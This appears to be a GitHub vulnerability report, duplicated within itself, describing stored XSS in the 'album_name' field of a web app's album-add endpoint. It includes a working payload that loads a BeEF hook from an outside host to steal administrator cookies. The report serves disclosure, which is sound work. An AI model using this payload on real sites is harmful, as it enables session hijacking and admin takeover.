The POST parameter "album_name" in the path "/index.php/album/add" has storage XSS. This can result in arbitrary JS code execution, obtaining administrator cookies to obtain administrator permissions, etc
The album name can inject XSS <svg/onload=$.getScript("http://gp.io:81");> Introduce hook. Js of beef
XSS is triggered when the administrator goes online
Beef goes online and gets the cookie
The text was updated successfully, but these errors were encountered:
Alert users who are still using the project
The POST parameter "album_name" in the path "/index.php/album/add" has storage XSS. This can result in arbitrary JS code execution, obtaining administrator cookies to obtain administrator permissions, etc
The album name can inject XSS
<svg/onload=$.getScript("http://gp.io:81");>Introduce hook. Js of beefXSS is triggered when the administrator goes online
Beef goes online and gets the cookie
The text was updated successfully, but these errors were encountered: